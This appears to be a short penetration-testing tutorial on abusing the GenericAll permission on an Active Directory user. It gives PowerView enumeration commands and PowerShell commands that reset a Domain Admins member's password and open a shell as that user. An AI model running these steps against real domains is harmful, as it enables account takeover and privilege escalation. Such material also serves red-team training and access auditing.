GenericAll On User

GenericAll

GenericAll : Is a permission that gives full rights to an active directory objects. If you have GenericAll on user object, you can reset user’s password without knowing the current password of the user, thereby escalating your privileges.

Enumeration

PowerView

GenericAll Enumeration

Get your current user’s sid by executing whoami /user, import powerview, then execute the below command to get the list of objects on which you have GenericAll right.

Command

get-objectacl -resolveguids | ? {($_.securityidentifier -eq "[your_current_user_sid]") -and ($_.activedirectoryrights -eq "GenericAll")}

below image shows the current user usman has GenericAll right on user object ali

User Enumeration

Execute the below command to get more information about the target user.

Command

get-netuser [target_user]

below image shows the target user ali is a member of Domain Admins

BloodHound

You can also get thesame result using bloodhound.

below image shows the current user usman has GenericAll right on user object ali who is a member of Domain Admins

Exploitation

PowerView

Since you have GenericAll right on user ali, you can reset his password and login to his account by executing the below command

Command

$pass = ConvertTo-SecureString '[Your New Password Here]' -AsPlainText -Force
set-domainuserpassword -identity [target_user] -accountpassword $pass 
runas /user:[domain\user] cmd.exe

References

• https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectoryrights?view=netframework-4.7.2
• https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse